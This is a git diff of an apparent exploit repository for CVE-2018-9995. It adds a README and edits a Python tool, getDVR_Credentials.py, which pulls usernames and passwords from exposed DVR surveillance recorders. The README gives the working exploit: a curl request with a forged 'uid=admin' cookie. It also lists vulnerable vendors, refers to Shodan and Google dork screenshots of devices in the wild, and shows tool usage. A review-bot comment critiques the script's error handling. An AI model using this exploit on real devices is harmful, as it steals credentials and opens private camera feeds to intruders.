diff --git a/README.md b/README.md
index 4bbf911..29dab84 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,85 @@ -# TBK_VISION_DVR-CVE-2018-9995- -(CVE-2018-9995) +# [Tool] show DVR Credentiales + + [*] Exploit Title: "Gets DVR Credentials" + [*] CVE: CVE-2018-9995 + [*] CVSS Base Score v3: 7.3.* / 10 + [*] CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + [*] Date: 09/04/2018 + [*] Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) + +![DVR](screenshot/login.png) + +### Exploit: + +``` + $> curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" + +``` +## tested in DVR (banner/vendor ?): + Novo + CeNova + QSee + Pulnix + XVR 5 in 1 (title: "XVR Login") + Securus, - Security. Never Compromise !! - + Night OWL + DVR Login + HVR Login + MDVR Login + +# On the Wild: +![DVR_dorks_2](screenshot/cow/shodan_1.png) ![DVR_dorks_1](screenshot/cow/google_1.png) +![DVR_dorks_3](screenshot/cow/shodan_2.png) + +## Possible Banners frontend (web): +![DVR_login_1](screenshot/loginFron/login_1.png) +![DVR_login_2](screenshot/loginFron/login_2.png) +![DVR_login_3](screenshot/loginFron/login_3.png) +![DVR_login_4](screenshot/loginFron/login_4.png) +![DVR_login_5](screenshot/loginFron/login_5.png) +![DVR_login_6](screenshot/loginFron/login_6.png) +![DVR_login_7](screenshot/loginFron/login_7.png) +![DVR_login_8](screenshot/loginFron/login_9.png) +![DVR_login_9](screenshot/loginFron/login_9.png) +![DVR_login_10](screenshot/loginFron/login_10.png) + +## Indoor: +![DVR_indoor_1](screenshot/indoor/in_x.png) +![DVR_indoor_2](screenshot/indoor/in_x1.png) +![DVR_indoor_3](screenshot/indoor/in_1.png) +![DVR_indoor_4](screenshot/indoor/in_2.png) +![DVR_indoor_5](screenshot/indoor/in_3.png) +![DVR_indoor_6](screenshot/indoor/in_4.png) +![DVR_indoor_7](screenshot/indoor/in_5.png) + + +# TOOL: "show DVR Credentiales" + +## Quick start (wait !) 
+ + usr@pwn:~$ git clone https://github.com/ezelf/************.git + usr@pwn:~$ cd ************* + +## help + + usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT] + + [+] Obtaining Exposed credentials + + optional arguments: + -h, --help show this help message and exit + -v, --version show program's version number and exit + --host HOST Host + --port PORT Port + + [+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81 + + +## pocs tool: +![DVR_poc_4](screenshot/toolOutput/poc_4.png) +![DVR_poc_3](screenshot/toolOutput/poc_3.png) +![DVR_poc_2](screenshot/toolOutput/poc_2.png) +![DVR_poc_1](screenshot/toolOutput/poc_1.png) + + + diff --git a/getDVR_Credentials.py b/getDVR_Credentials.py index a997ee4..c54ad70 100644 --- a/getDVR_Credentials.py +++ b/getDVR_Credentials.py @@ -45,6 +45,7 @@ def makeReqHeaders(xCookie): headers["Connection"] = "close" headers["Content-Type"] = "text/html" headers["Cookie"] = "uid="+xCookie + return headers try: @@ -53,8 +54,16 @@ def makeReqHeaders(xCookie): print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT exit() -dataJson = json.loads(rX.text) -totUsr = len(dataJson["list"]) #--> 10 +badJson = rX.text +try: + dataJson = json.loads(badJson) + totUsr = len(dataJson["list"]) #--> 10 +except Exception, e: + print " [+] Error: "+str(e) + print " [>] json: "+str(rX) +# print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin")) + exit() + print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT @@ -78,9 +87,9 @@ def makeReqHeaders(xCookie): final_data.append(temp) - hdUsr = Colors.GREEN+"Username"+Colors.DEFAULT - hdPass = Colors.GREEN+"Password"+Colors.DEFAULT - hdRole = Colors.GREEN+"Role ID"+Colors.DEFAULT + hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT + hdPass = Colors.GREEN + "Password" + Colors.DEFAULT + hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT cabeceras = [hdUsr, hdPass, hdRole] 
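Review bot: In the `@@ -53,8 +54,16 @@` hunk of getDVR_Credentials.py, the new error path prints `str(rX)` under the label `json:`. Assuming `rX` is a requests response, that prints the object's repr rather than the body; `badJson` already holds `rX.text` and is otherwise unused, so it is presumably the value the message was meant to show. `except Exception, e:` also folds a non-JSON reply and a JSON reply without a `list` key into one message; `except (ValueError, KeyError), e:` would keep them apart and let unrelated errors surface. The bare `exit()` ends the script with status 0, so a wrapper cannot tell this failure from a normal run; a non-zero status such as `exit(1)` would. The commented-out `Reuest` debug line is better dropped than committed.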
@@ -90,4 +99,5 @@ def makeReqHeaders(xCookie): print "\n [!]: "+str(e) print " [+] "+ str(dataJson) -print "\n" \ No newline at end of file +print "\n" + diff --git a/screenshot/cow/google_1.png b/screenshot/cow/google_1.png new file mode 100644 index 0000000..c702e46 Binary files /dev/null and b/screenshot/cow/google_1.png differ diff --git a/screenshot/cow/shodan_1.png b/screenshot/cow/shodan_1.png new file mode 100644 index 0000000..c0c0f3e Binary files /dev/null and b/screenshot/cow/shodan_1.png differ diff --git a/screenshot/cow/shodan_2.png b/screenshot/cow/shodan_2.png new file mode 100644 index 0000000..604d537 Binary files /dev/null and b/screenshot/cow/shodan_2.png differ diff --git a/screenshot/indoor/in_1.png b/screenshot/indoor/in_1.png new file mode 100644 index 0000000..49cdfb5 Binary files /dev/null and b/screenshot/indoor/in_1.png differ diff --git a/screenshot/indoor/in_2.png b/screenshot/indoor/in_2.png new file mode 100644 index 0000000..a17d018 Binary files /dev/null and b/screenshot/indoor/in_2.png differ diff --git a/screenshot/indoor/in_3.png b/screenshot/indoor/in_3.png new file mode 100644 index 0000000..0f7405d Binary files /dev/null and b/screenshot/indoor/in_3.png differ diff --git a/screenshot/indoor/in_4.png b/screenshot/indoor/in_4.png new file mode 100644 index 0000000..e0a4373 Binary files /dev/null and b/screenshot/indoor/in_4.png differ diff --git a/screenshot/indoor/in_5.png b/screenshot/indoor/in_5.png new file mode 100644 index 0000000..408f1e1 Binary files /dev/null and b/screenshot/indoor/in_5.png differ diff --git a/screenshot/indoor/in_x.png b/screenshot/indoor/in_x.png new file mode 100644 index 0000000..3433901 Binary files /dev/null and b/screenshot/indoor/in_x.png differ diff --git a/screenshot/indoor/in_x1.png b/screenshot/indoor/in_x1.png new file mode 100644 index 0000000..9caf63c Binary files /dev/null and b/screenshot/indoor/in_x1.png differ 
diff --git a/screenshot/loginFront/login_1.png b/screenshot/loginFront/login_1.png
new file mode 100644
index 0000000..8b4abd3
Binary files /dev/null and b/screenshot/loginFront/login_1.png differ
diff --git a/screenshot/loginFront/login_10.png b/screenshot/loginFront/login_10.png
new file mode 100644
index 0000000..cb8b64d
Binary files /dev/null and b/screenshot/loginFront/login_10.png differ
diff --git a/screenshot/loginFront/login_2.png b/screenshot/loginFront/login_2.png
new file mode 100644
index 0000000..f1f75c6
Binary files /dev/null and b/screenshot/loginFront/login_2.png differ
diff --git a/screenshot/loginFront/login_3.png b/screenshot/loginFront/login_3.png
new file mode 100644
index 0000000..26e4481
Binary files /dev/null and b/screenshot/loginFront/login_3.png differ
diff --git a/screenshot/loginFront/login_4.png b/screenshot/loginFront/login_4.png
new file mode 100644
index 0000000..d704753
Binary files /dev/null and b/screenshot/loginFront/login_4.png differ
diff --git a/screenshot/loginFront/login_5.png b/screenshot/loginFront/login_5.png
new file mode 100644
index 0000000..7a0d266
Binary files /dev/null and b/screenshot/loginFront/login_5.png differ
diff --git a/screenshot/loginFront/login_6.png b/screenshot/loginFront/login_6.png
new file mode 100644
index 0000000..27a1448
Binary files /dev/null and b/screenshot/loginFront/login_6.png differ
diff --git a/screenshot/loginFront/login_7.png b/screenshot/loginFront/login_7.png
new file mode 100644
index 0000000..799277a
Binary files /dev/null and b/screenshot/loginFront/login_7.png differ
diff --git a/screenshot/loginFront/login_8.png b/screenshot/loginFront/login_8.png
new file mode 100644
index 0000000..783f674
Binary files /dev/null and b/screenshot/loginFront/login_8.png differ
diff --git a/screenshot/loginFront/login_9.png b/screenshot/loginFront/login_9.png
new file mode 100644
index 0000000..45877f4
Binary files /dev/null and b/screenshot/loginFront/login_9.png differ
diff --git a/screenshot/toolOutput/poc_1.png b/screenshot/toolOutput/poc_1.png
new file mode 100644
index 0000000..e89e004
Binary files /dev/null and b/screenshot/toolOutput/poc_1.png differ
diff --git a/screenshot/toolOutput/poc_2.png b/screenshot/toolOutput/poc_2.png
new file mode 100644
index 0000000..27ca046
Binary files /dev/null and b/screenshot/toolOutput/poc_2.png differ
diff --git a/screenshot/toolOutput/poc_3.png b/screenshot/toolOutput/poc_3.png
new file mode 100644
index 0000000..8a34ddc
Binary files /dev/null and b/screenshot/toolOutput/poc_3.png differ
diff --git a/screenshot/toolOutput/poc_4.png b/screenshot/toolOutput/poc_4.png
new file mode 100644
index 0000000..4050f4e
Binary files /dev/null and b/screenshot/toolOutput/poc_4.png differ
diff --git a/screenshot/v/tbk_vision/indoor_1.png b/screenshot/v/tbk_vision/indoor_1.png
new file mode 100644
index 0000000..ec58fcd
Binary files /dev/null and b/screenshot/v/tbk_vision/indoor_1.png differ
diff --git a/screenshot/v/tbk_vision/login_1.png b/screenshot/v/tbk_vision/login_1.png
new file mode 100644
index 0000000..7d6ac69
Binary files /dev/null and b/screenshot/v/tbk_vision/login_1.png differ